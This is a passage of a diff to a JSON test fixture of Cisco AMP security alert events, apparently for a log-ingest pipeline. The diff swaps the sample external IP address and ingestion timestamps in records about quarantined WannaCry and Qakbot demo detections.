4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764345400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -5055,7 +5055,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -5100,7 +5100,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5110,8 +5110,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025372836Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764350700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -5131,7 +5131,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5172,7 +5172,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5182,8 +5182,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025375107Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764356Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5203,7 +5203,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5248,7 +5248,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5258,8 +5258,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025377372Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764377900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5279,7 +5279,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5324,7 +5324,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5334,8 +5334,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025383531Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764381800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -5355,7 +5355,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5398,7 +5398,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5412,8 +5412,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025387308Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764387200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5435,7 +5435,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5478,7 +5478,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5492,8 +5492,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025389632Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:39.764393100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5515,7 +5515,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5562,7 +5562,7 @@ "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5576,8 +5576,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025391879Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", + "ingested": "2021-12-09T13:35:39.764398700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -5599,7 +5599,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5640,7 +5640,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5650,8 +5650,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025394104Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 